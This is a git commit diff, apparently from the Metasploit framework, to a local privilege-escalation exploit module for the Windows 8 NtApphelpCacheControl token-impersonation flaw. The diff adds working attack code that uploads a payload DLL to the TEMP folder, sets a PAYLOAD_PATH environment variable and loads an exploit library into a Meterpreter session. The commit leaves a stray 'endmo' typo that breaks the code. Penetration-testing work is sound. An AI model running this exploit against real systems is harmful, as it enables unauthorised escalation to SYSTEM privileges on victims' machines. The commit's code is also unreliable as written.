"Stash" it
sinn3r
parent
c60b6969bc
commit
0e6c7181b1
|
|
@ -5,15 +5,12 @@
|
|||
|
||||
require 'msf/core'
|
||||
require 'msf/core/post/windows/reflective_dll_injection'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = AverageRanking
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::FileInfo
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
def initialize(info={})
|
||||
|
|
@ -21,15 +18,17 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'Name' => 'Windows NtApphelpCacheControl Token Impersonation',
|
||||
'Description' => %q{
|
||||
On Windows 8, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)
|
||||
allows application compatibility data to be cached for quick reuse when new processes are created.
|
||||
A normal user can query the cache but cannot add new cached entries as the operation is restricted
|
||||
to administrators. This is checked in the function AhcVerifyAdminContext.
|
||||
allows application compatibility data to be cached for quick reuse when new processes are
|
||||
created. A normal user can query the cache but cannot add new cached entries as the
|
||||
operation is restricted to administrators. This is checked in the function
|
||||
AhcVerifyAdminContext.
|
||||
|
||||
This function has a vulnerability where it doesn't correctly check the impersonation token of the
|
||||
caller to determine if the user is an administrator. It reads the caller's impersonation token
|
||||
using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to
|
||||
LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an
|
||||
identify token on your thread from a local system process and bypass this check.
|
||||
This function has a vulnerability where it doesn't correctly check the impersonation token
|
||||
of the caller to determine if the user is an administrator. It reads the caller's
|
||||
impersonation token using PsReferenceImpersonationToken and then does a comparison between
|
||||
the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level
|
||||
of the token so it's possible to get an identify token on your thread from a local system
|
||||
process and bypass this check.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
|
@ -63,15 +62,62 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
}))
|
||||
end
|
||||
|
||||
def upload_payload_dll(payload_filepath)
|
||||
payload = generate_payload_dll({:dll_exitprocess => true})
|
||||
begin
|
||||
write_file(payload_filepath, payload)
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
fail_with(
|
||||
Exploit::Exception::Unknown,
|
||||
"Error uploading file #{payload_filepath}: #{e.class} #{e}"
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
def set_filepath_env(payload_filepath)
|
||||
session.railgun.kernel32.SetEnvironmentVariableA("PAYLOAD_PATH", payload_filepath)
|
||||
if get_env("PAYLOAD_PATH") != payload_filepath
|
||||
fail_with(Exploit::Exception::Unknown, "Failed to set environment variable PAYLOAD_PATH")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
integrity = get_integrity_level
|
||||
case integrity
|
||||
when :low
|
||||
integrity = 0
|
||||
when :medium
|
||||
integrity = 1
|
||||
when :high
|
||||
integrity = 2
|
||||
when :system
|
||||
integrity = 3
|
||||
end
|
||||
|
||||
print_status("Your current integrity level is: #{integrity.to_s}")
|
||||
|
||||
if integrity > 1
|
||||
print_status("Your integrity level is high enough this exploit isn't suitable for you")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
temp = get_env('TEMP')
|
||||
if temp.blank?
|
||||
print_error("Unable to read TEMP")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Loading Exploit Library...")
|
||||
payload_filepath = "#{temp}\\msf_payload.dll"
|
||||
print_status("Uploading the Payload DLL to #{payload_filepath}...")
|
||||
upload_payload_dll(payload_filepath)
|
||||
if !file?(payload_filepath)
|
||||
print_error("Failed to save the payload DLL due to an unknown reason")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Loading Exploit Library...")
|
||||
session.core.load_library(
|
||||
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", "exploit.dll"),
|
||||
'TargetFilePath' => temp + "\\ntapphelpcachecontrol.dll",
|
||||
|
|
@ -79,6 +125,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'Extension' => false,
|
||||
'SaveToDisk' => false
|
||||
)
|
||||
end
|
||||
endmo
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue